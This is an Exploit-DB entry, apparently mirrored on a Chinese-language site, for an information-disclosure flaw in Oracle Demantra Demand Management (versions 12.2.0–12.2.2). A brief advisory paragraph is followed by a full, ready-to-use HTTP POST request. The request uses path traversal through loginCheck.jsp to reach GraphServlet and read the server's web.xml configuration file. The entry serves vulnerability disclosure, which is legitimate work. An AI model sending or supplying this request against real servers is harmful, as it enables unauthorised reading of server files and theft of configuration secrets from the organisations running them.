Oracle Supply Chain Products Suite – Remote Security

• Exploit Database
• 19 阅读

• 作者： Oracle
  日期： 2014-01-14
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/39018/

• source: https://www.securityfocus.com/bid/64836/info
  
  Oracle Supply Chain Products Suite is prone to a remote vulnerability in Oracle Demantra Demand Management.
  
  The vulnerability can be exploited over the 'HTTP' protocol. The 'DM Others' sub component is affected.
  
  Attackers can exploit this issue to obtain sensitive information.
  
  This vulnerability affects the following supported versions:
  12.2.0, 12.2.1, 12.2.2
  
  POST /demantra/common/loginCheck.jsp/../../GraphServlet HTTP/1.1
  Host: target.com:8080
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  DNT: 1
  Connection: keep-alive
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 46
  
  filename=C:/Program Files (x86)/Oracle Demantra Spectrum/Collaborator/demantra/WEB-INF/web.xml